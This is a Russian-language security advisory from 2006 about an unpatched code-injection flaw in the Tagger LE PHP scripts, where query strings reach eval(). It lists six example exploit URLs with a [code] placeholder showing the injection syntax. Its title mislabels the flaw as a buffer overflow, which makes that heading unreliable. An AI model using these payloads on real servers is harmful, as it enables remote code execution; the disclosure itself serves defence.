Security Lab

Удаленное переполнение буфера в Tagger LE

Дата публикации:14.09.2006
Дата изменения:17.10.2006
Всего просмотров:2926
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Tagger LE
Уязвимые версии: Tagger LE

Описание: Злоумышленник может скомпрометировать уязвимую систему.

Сценарии tags.php, sign.php, и admin/index.php не санируют строку запроса перед ее использованием в "eval()". В результате можно внедрить и выполнить произвольный PHP код, используя специально сформированные параметры.

Пример/Эксплоит:

http://[host]/tags.php?foo=%22.[code].%22
http://[host]/sign.php?foo=%22.[code].%22
http://[host]/admin/index.php?foo=%22.[code].%22
http://[host]/taggerLE/tags.php?foo;[code];$foo=foo
http://[host]/taggerLE/sign.php?foo;[code];$foo=foo
http://[host]/admin/index.php?foo;[code];$foo=foo

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.